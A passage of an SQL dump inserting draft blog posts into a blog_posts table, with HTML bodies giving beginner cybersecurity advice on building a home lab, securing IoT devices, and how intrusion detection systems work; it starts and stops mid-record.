leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Plan Your Setup</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Decide what tools, operating systems, and equipment fit your goals.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Install Virtualization Software</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Set up and configure your virtualization tool of choice.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Create Virtual Machines</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Install multiple operating systems, ensuring to allocate sufficient resources (CPU, RAM, storage) to each.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Install Cybersecurity Tools</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Download and configure open-source and commercial tools for practice.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Simulate a Network Environment</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] 
my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use your networking equipment or virtualized networks to replicate a real-world setup.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"6\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Experiment Safely</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Practice penetration testing, vulnerability scanning, and network defense—all within your controlled environment.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Building a Home Lab for Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Creating a home lab offers countless benefits:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hands-On Training</strong></b>: Theory only gets you so far; a home lab provides the hands-on experience employers value most.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Skill Development</strong></b>: Practice key skills like ethical hacking, network defense, and incident response.</li>\r\n 	<li class=\"text-body 
font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Safe Learning Environment</strong></b>: Experimentation in your lab carries no real-world risks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Flexible Learning</strong></b>: Tinker and learn at your own pace, tailoring the experience to your interests and career goals.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re passionate about cybersecurity, a home lab is an invaluable investment in your future. Whether you\'re just getting started or looking to advance your skills, having the right tools and resources at your fingertips will help you excel in this dynamic field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Take the first step today—start setting up your cybersecurity home lab, and get ready to unlock your full potential. Happy learning!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:28:56', '2026-01-12 21:41:44', 'Information Security', 'Building a Home Lab for Cybersecurity Beginners', '', NULL),
(134, 'IoT Security: Protecting Your Smart Devices and Data', 'iot-security-protecting-your-smart-devices-and-data', '<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why IoT Security Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Internet of Things (IoT) is revolutionizing how we live, work, and interact with technology every day. With smart homes, wearable tech, industrial automation, and connected infrastructure, IoT devices have become essential tools in our increasingly connected lives. However, with great connectivity comes great responsibility, particularly in addressing the significant security risks these devices present.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding IoT security is critical if we want to fully enjoy the benefits of connected devices without facing the potential dangers. Here’s why prioritizing IoT security is non-negotiable:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Protecting Sensitive Information</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IoT devices collect and store large quantities of sensitive data, including location history, medical information, and financial data. This makes them prime targets for hackers and unauthorized access attempts. Without proper security, this information is vulnerable to breaches, potentially exposing users to identity theft, spying, or fraud.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
Safeguarding Privacy</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Maintaining privacy is becoming increasingly difficult in a hyperconnected world. Weak IoT security measures compromise the confidentiality of users\' personal data, resulting in unwanted invasions of privacy. Did you know that even unprotected smart home devices, like a thermostat or camera, can expose user habits to cybercriminals?</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Addressing a Large Attack Surface</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The abundance of IoT devices in homes, businesses, and critical industries has created a vast attack surface for potential cyberattacks. Each connected device becomes a potential entry point for hackers, putting entire ecosystems of systems at risk. Managing these vulnerabilities is critical to crafting a secure environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Preventing Data Breaches</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Weak IoT security can lead to data breaches, placing businesses, governments, and individuals at risk. For organizations, a breach of customer data could damage both finances and reputation. For critical infrastructure, the stakes are even higher, with potential service disruptions that could impact entire communities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By focusing on IoT security, individuals and organizations can prevent these threats and fortify their systems to remain resilient against cyber challenges. But how do you protect your IoT ecosystem effectively? 
Below are seven essential steps to improving IoT security.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7 Key Steps to Enhance IoT Security</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1. Strengthen Device Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Safeguarding individual IoT devices is the foundation of any strong security strategy. To secure your devices effectively:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Always choose devices from reputable manufacturers with a proven track record of security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Configure IoT devices properly as soon as you install them. Avoid keeping default factory settings, particularly usernames and passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Use strong, unique passwords and enable encryption where possible.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Keep your devices updated with the latest firmware and security patches. 
Outdated software is often a gateway for attackers.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By beginning with strong device-level defenses, you lay the groundwork for a robust IoT security framework.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2. Invest in Network Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A secure IoT ecosystem needs more than protected devices—it needs a secure network to function on. Here’s how to achieve it:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use encryption technologies, secure firewalls, and Virtual Private Networks (VPNs) to protect your network traffic from prying eyes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Safeguard your Wi-Fi network with strong encryption protocols and complex passwords. Avoid default SSIDs that can reveal your device type or location.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Employ secure communication protocols like TLS (Transport Layer Security) or SSL (Secure Sockets Layer) to ensure data transmission is safe. Note that all SSL versions are deprecated, so prefer a current TLS version wherever the device supports it.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3. 
Control Authentication and Access</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Secure authentication practices can significantly reduce the risk of unauthorized access. Best practices include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Implementing strong authentication mechanisms such as password protection, biometrics (e.g., fingerprint or facial recognition), and encryption certificates to restrict who can access your devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Leveraging role-based access control to limit permissions at both device and data levels. Only authorized individuals should have access to sensitive information.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4. Ensure Data Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IoT devices collect and transmit enormous quantities of data regularly. To protect these data assets, consider the following:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Encrypt data both during transit and when at rest. 
Encryption prevents unauthorized users from understanding captured data if they intercept it.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Implement secure storage practices like regular data backups and clear data retention policies to ensure sensitive information is handled with care and remains accessible when needed.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5. Monitor and Log Activity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding what’s happening within your IoT ecosystem is critical to addressing potential threats. Practical measures here include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Installing monitoring software to track device behavior and identify anomalies or suspicious activity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Setting up robust logging protocols to keep a record of events across connected devices. These logs can help investigate incidents and offer insights for future improvements.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6. Vet and Monitor Third-Party Providers</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IoT ecosystems often rely on third-party service providers (e.g., cloud platforms). 
To manage this complexity:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Thoroughly examine the security credentials and certifications offered by your vendors.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Conduct regular security assessments to identify any weak links in your providers’ systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Establish a monitoring process to ensure third parties maintain security over time. Always avoid providers who do not offer transparency regarding their security practices.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 7. Educate and Raise Awareness</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Continuous education is one of the most impactful ways to ensure IoT devices remain secure. 
Keep your workforce and family members informed:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Train employees and users on securing device configurations, creating strong passwords, and respecting data privacy principles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Highlight common risks, including phishing attacks and social engineering, to make individuals more security-conscious.</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">IoT Security is an Ongoing Process</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IoT security is not a one-and-done task. It’s a dynamic, ongoing process that requires vigilance and collaboration. Cyber threats evolve continuously, and staying one step ahead means adapting to new challenges with upgraded tools, updated configurations, and increased user knowledge.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By following the steps above, from securing devices to educating users, organizations and individuals can mitigate the security risks linked to IoT devices. Prioritizing IoT security isn’t just about protecting the devices themselves—it’s about safeguarding the data, privacy, and trust that these devices carry into our daily lives.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To further secure your connected ecosystem, start evaluating your current IoT infrastructure and begin implementing these strategies today. 
A secure IoT world is within reach—are you ready to take the first step?</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This SEO-optimized blog post not only highlights the critical importance of IoT security but also offers actionable advice for businesses and individuals. The use of keywords like “IoT security,” “protect IoT devices,” and “enhance IoT security” ensures better search visibility and relevance for readers seeking this content.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:24:35', '2026-01-12 21:41:44', 'Information Security', 'IoT Security: Protecting Your Smart Devices and Data', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(135, 'The Fundamentals of Intrusion Detection Systems (IDS): How They Work and Why They\'re Essential', 'the-fundamentals-of-intrusion-detection-systems-ids-how-they-work-and-why-theyre-essential', '<div class=\"flex-1 overflow-hidden\">\r\n<div class=\"h-full overflow-y-auto\">\r\n<div class=\"flex flex-col items-center text-sm h-full dark:bg-gray-800\">\r\n<div class=\"w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]\">\r\n<div class=\"text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0\">\r\n<div class=\"relative flex w-[calc(100%-50px)] md:flex-col lg:w-[calc(100%-115px)]\">\r\n<div class=\"flex flex-grow flex-col gap-3\">\r\n<div class=\"min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap\">\r\n<div class=\"markdown prose w-full break-words dark:prose-invert dark\">\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity threats continue to evolve, making robust network protection more critical than ever. If you\'re looking to enhance your security strategy, understanding <b><strong class=\"font-bold\">Intrusion Detection Systems (IDS)</strong></b> is a great place to start. This blog explores how IDS works, the methods they use, and their importance in monitoring and protecting your network.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Is an Intrusion Detection System (IDS)?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">At its core, an <b><strong class=\"font-bold\">Intrusion Detection System (IDS)</strong></b> is a cybersecurity tool that monitors a network or system for any signs of malicious activity. 
Rather than blocking threats, the IDS detects suspicious actions and alerts administrators so they can respond swiftly and appropriately.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While IDS alone doesn’t prevent attacks—it leaves that task to an <b><strong class=\"font-bold\">Intrusion Prevention System (IPS)</strong></b>—it\'s an essential first step in identifying vulnerabilities before they escalate into data breaches or other serious security concerns.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Two Primary Methods of Traffic Monitoring</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IDS operates by analyzing network traffic, and there are two primary methods for capturing and examining this traffic to identify threats effectively.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Packet Capture</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">How it works</strong></b>: This method captures raw network packets at the <b><strong class=\"font-bold\">data link</strong></b> or <b><strong class=\"font-bold\">network layer</strong></b>. 
It examines every packet in the monitored network segment to uncover vulnerabilities or malicious activities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Where it\'s used</strong></b>: Network-based Intrusion Detection Systems (<b><strong class=\"font-bold\">NIDS</strong></b>) frequently rely on this approach to scan packets across an entire network.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Benefits</strong></b>: Offers a granular view of network traffic, making it effective for detecting distributed attacks or threats affecting multiple systems.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
Protocol Analysis</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">How it works</strong></b>: This method focuses on analyzing higher-level protocols, like <b><strong class=\"font-bold\">TCP, UDP</strong></b>, and specific aspects of communication such as application-layer data or system calls.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Where it\'s used</strong></b>: Host-based Intrusion Detection Systems (<b><strong class=\"font-bold\">HIDS</strong></b>) commonly adopt this approach for pinpointing irregular activity within a specific device or host.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Benefits</strong></b>: Provides in-depth insights into communications, making it ideal for evaluating patterns within application-level interactions, like missing authentication attempts.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By combining packet capture and protocol analysis, many IDS solutions provide broader visibility into network and host-level activity.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How an IDS Identifies Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once network traffic is captured, it’s time for the IDS to perform its magic. 
